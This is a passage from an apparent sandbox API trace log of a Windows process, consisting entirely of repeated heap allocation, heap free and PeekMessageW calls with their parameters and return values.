1 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9d38 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9238 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93b8 [0245.400] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d30 [0245.400] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93b8 | out: hHeap=0xbe0000) returned 1 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d30 | out: hHeap=0xbe0000) returned 1 [0245.401] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9d60 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93b8 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d30 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93b8 | out: hHeap=0xbe0000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9d88 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93b8 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93d0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d40 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93d0 | out: hHeap=0xbe0000) returned 1 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d40 | out: hHeap=0xbe0000) returned 1 [0245.401] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9db0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93d0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d40 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93d0 | out: hHeap=0xbe0000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee10 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93d0 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d50 [0245.401] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93e8 | out: hHeap=0xbe0000) returned 1 [0245.401] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d60 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93e8 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d60 | out: hHeap=0xbe0000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9dd8 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d60 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d60 | out: hHeap=0xbe0000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9400 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d60 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d60 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93e8 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9400 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9dd8 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d50 | out: hHeap=0xbe0000) returned 1 [0245.402] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9dd8 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9400 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d50 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9400 | out: hHeap=0xbe0000) returned 1 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9e00 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9400 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d60 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93e8 | out: hHeap=0xbe0000) returned 1 [0245.402] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d60 | out: hHeap=0xbe0000) returned 1 [0245.402] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.402] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9e28 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d60 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf93e8 | out: hHeap=0xbe0000) returned 1 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfed68 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf93e8 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9418 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d70 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9418 | out: hHeap=0xbe0000) returned 1 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d70 | out: hHeap=0xbe0000) returned 1 [0245.403] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9e50 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9418 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d70 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9418 | out: hHeap=0xbe0000) returned 1 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee48 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9418 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9430 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d80 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9430 | out: hHeap=0xbe0000) returned 1 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d80 | out: hHeap=0xbe0000) returned 1 [0245.403] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9e78 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9430 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d80 [0245.403] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9430 | out: hHeap=0xbe0000) returned 1 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfee80 [0245.403] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9430 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5d90 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ea0 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5da0 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5da0 | out: hHeap=0xbe0000) returned 1 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9460 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5da0 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5da0 | out: hHeap=0xbe0000) returned 1 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9460 | out: hHeap=0xbe0000) returned 1 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9ea0 | out: hHeap=0xbe0000) returned 1 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5d90 | out: hHeap=0xbe0000) returned 1 [0245.404] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ea0 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9460 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5d90 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9460 | out: hHeap=0xbe0000) returned 1 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ec8 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9460 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5da0 [0245.404] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.404] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ef0 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5db0 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5db0 | out: hHeap=0xbe0000) returned 1 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9478 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5db0 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5db0 | out: hHeap=0xbe0000) returned 1 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9490 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5db0 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5db0 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9478 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9490 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xce9ef0 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5da0 | out: hHeap=0xbe0000) returned 1 [0245.405] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9ef0 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9490 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5da0 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9490 | out: hHeap=0xbe0000) returned 1 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9f18 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9490 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9478 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5db0 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9478 | out: hHeap=0xbe0000) returned 1 [0245.405] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5db0 | out: hHeap=0xbe0000) returned 1 [0245.405] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.405] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9f40 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9478 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5db0 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9478 | out: hHeap=0xbe0000) returned 1 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9f68 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9478 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5dc0 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5dc0 | out: hHeap=0xbe0000) returned 1 [0245.406] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9f90 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5dc0 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9448 | out: hHeap=0xbe0000) returned 1 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9fb8 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9448 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94a8 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5dd0 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94a8 | out: hHeap=0xbe0000) returned 1 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5dd0 | out: hHeap=0xbe0000) returned 1 [0245.406] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xce9fe0 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94a8 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5dd0 [0245.406] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94a8 | out: hHeap=0xbe0000) returned 1 [0245.406] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea008 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94a8 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94c0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5de0 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94c0 | out: hHeap=0xbe0000) returned 1 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5de0 | out: hHeap=0xbe0000) returned 1 [0245.407] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea030 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94c0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5de0 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94c0 | out: hHeap=0xbe0000) returned 1 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfeeb8 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94c0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94d8 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5df0 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94d8 | out: hHeap=0xbe0000) returned 1 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5df0 | out: hHeap=0xbe0000) returned 1 [0245.407] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea058 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94d8 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5df0 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94d8 | out: hHeap=0xbe0000) returned 1 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfeef0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94d8 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94f0 [0245.407] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e00 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94f0 | out: hHeap=0xbe0000) returned 1 [0245.407] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e00 | out: hHeap=0xbe0000) returned 1 [0245.408] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea080 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94f0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e00 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf94f0 | out: hHeap=0xbe0000) returned 1 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfef28 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf94f0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9508 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e10 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9508 | out: hHeap=0xbe0000) returned 1 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e10 | out: hHeap=0xbe0000) returned 1 [0245.408] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea0a8 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9508 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e10 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9508 | out: hHeap=0xbe0000) returned 1 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfef60 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9508 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9520 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e20 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9520 | out: hHeap=0xbe0000) returned 1 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e20 | out: hHeap=0xbe0000) returned 1 [0245.408] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea0d0 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9520 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e20 [0245.408] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9520 | out: hHeap=0xbe0000) returned 1 [0245.408] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x40) returned 0xc83920 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9520 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9538 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e30 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9538 | out: hHeap=0xbe0000) returned 1 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e30 | out: hHeap=0xbe0000) returned 1 [0245.409] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea0f8 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9538 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e30 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9538 | out: hHeap=0xbe0000) returned 1 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x30) returned 0xcfef98 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9538 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9550 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x8) returned 0xcf5e40 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9550 | out: hHeap=0xbe0000) returned 1 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf5e40 | out: hHeap=0xbe0000) returned 1 [0245.409] PeekMessageW (in: lpMsg=0x8bf904, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf904) returned 0 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x20) returned 0xcea120 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x10) returned 0xcf9550 [0245.409] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x0, Size=0x4) returned 0xcf5e40 [0245.409] HeapFree (in: hHeap=0xbe0000, dwFlags=0x0, lpMem=0xcf9550 | out: 